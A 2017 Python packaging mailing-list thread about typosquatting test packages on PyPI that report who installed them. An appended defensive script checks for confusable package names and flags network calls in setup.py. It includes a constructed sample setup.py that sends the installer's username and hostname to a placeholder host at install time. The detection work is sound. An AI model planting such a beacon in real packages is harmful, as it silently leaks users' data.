[Distutils] Malicious packages on PyPI

Matt Joyce matt at nycresistor.com
Thu Jun 1 13:32:19 EDT 2017


That's the package repo on GitHub.

It's basically a test dummy package that reports users who have run that
package template.

The site referenced lists the package name that the user ran to get posted
to the site.   There appear to be many packages in PyPI that are built off
this fatezero template.

It is non-destructive... as a test payload.  But the method used is
obviously highly successful as an attack vector.  There may be more
nefarious packages already in PyPI.

PyPI is not a very good package management solution.  Most folks I advise
to build from PyPI in CI/CD but push to production via a real package
management solution such as apt or yum.  Always double check sources coming
from the internet.


On Thu, Jun 1, 2017 at 1:24 PM, Thomas Kluyver <thomas at kluyver.me.uk> wrote:

> On closer examination, those packages do not actually appear to upload
> any information - they seem to be empty packages placed there to serve
> as a warning.
> It's not clear to me whether the data on the fatezero.org website is
> from other packages which really do upload data, or if it's fake.
> On Thu, Jun 1, 2017, at 06:18 PM, Thomas Kluyver wrote:
> > Are we aware of this?
> > http://evilpackage.fatezero.org/
> >
> > I recall there were a couple of these before which were taken down, but
> > someone appears to have made a cookiecutter template so you can very
> > easily claim names on PyPI, and anyone who installs that package will
> > submit their information to that site. A couple that are up at the
> > moment:
> >
> > https://pypi.python.org/pypi/requirements-txt/1.1.1
> > https://pypi.python.org/pypi/ztz/0.1.1
> >
> > Do we delete them? Do we try to detect similar packages being uploaded
> > and block them? I suspect it's a waste of time to try to prevent this in
> > general, but maybe it's worth protecting likely names that people might
> > 'pip install' by mistake, such as requirements-txt.
> >
> > Thomas
> > _______________________________________________
> > Distutils-SIG maillist  -  Distutils-SIG at python.org
> > https://mail.python.org/mailman/listinfo/distutils-sig
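Two defender-side checks that follow from the thread, written here as an added example (this is not code from the thread, from the fatezero template, or from PyPI's own tooling): whether a project name collides with, or sits one typo away from, a name people are likely to `pip install` by mistake (Thomas's example is requirements-txt), and whether a `setup.py` makes network or subprocess calls while pip is executing it, which is how an install-time beacon of the kind described above would phone home. The protected-name list, the suspicious-module set and the sample `setup.py` are constructed for this example; the collector hostname is a placeholder.

```python
"""Pre-install checks for a PyPI candidate: confusable name and install-time
network activity in setup.py. Added example; names and sample data constructed."""
import ast
import re

# Constructed list of names a user might type by mistake (extend for your site).
PROTECTED_NAMES = ["requirements.txt", "requests", "numpy", "setuptools"]

# Modules a setup.py has no ordinary reason to call while pip runs it.
# 'os' is deliberately excluded: os.path is legitimately common in setup.py.
NETWORK_MODULES = {"urllib", "urllib2", "requests", "socket", "http",
                   "httplib", "subprocess"}


def normalize(name: str) -> str:
    """PEP 503 name normalization: lowercase, runs of '-', '_', '.' become '-'.
    This is why 'requirements.txt' and 'requirements-txt' are the same name."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def name_confusable_with(candidate: str, protected=PROTECTED_NAMES, max_distance=1):
    """Return the protected names the candidate equals after normalization or
    is within max_distance edits of. Empty list means no collision."""
    cand = normalize(candidate)
    return [p for p in protected
            if cand == normalize(p) or edit_distance(cand, normalize(p)) <= max_distance]


def _dotted(node):
    """Render a call target such as urllib.parse.urlencode as a dotted string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # e.g. a call on a subscript or another call's result


def install_time_network_calls(setup_py_source: str):
    """Statically list (lineno, call) pairs in setup.py whose root module is in
    NETWORK_MODULES. Everything in setup.py runs during `pip install`, so any
    hit is worth a human look before the package is installed or mirrored."""
    tree = ast.parse(setup_py_source)
    aliases = {}  # local name -> top-level module it refers to
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[(a.asname or a.name).split(".")[0]] = a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = node.module.split(".")[0]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            target = _dotted(node.func)
            if target and aliases.get(target.split(".")[0]) in NETWORK_MODULES:
                findings.append((node.lineno, target))
    return sorted(findings)


# Constructed setup.py modelled on the behaviour described in the thread:
# it reports who installed the package before calling setup().
SAMPLE_SETUP_PY = '''\
from setuptools import setup
import getpass, socket
from urllib.request import urlopen
import urllib.parse

# install-time beacon (constructed sample; host is a placeholder)
data = urllib.parse.urlencode({"user": getpass.getuser(), "host": socket.gethostname()})
urlopen("http://collector.example.invalid/report?" + data)

setup(name="requirements-txt", version="1.1.1", py_modules=[])
'''

if __name__ == "__main__":
    print("confusable:", name_confusable_with("requirements-txt"))
    for lineno, call in install_time_network_calls(SAMPLE_SETUP_PY):
        print(f"setup.py:{lineno}: {call}")
```

The name check is intentionally conservative (distance 1 against a short curated list) so that it can gate uploads without drowning a registry team in false positives; the `setup.py` check is static and will miss dynamically built imports, so treat an empty result as "nothing obvious", not as a clean bill.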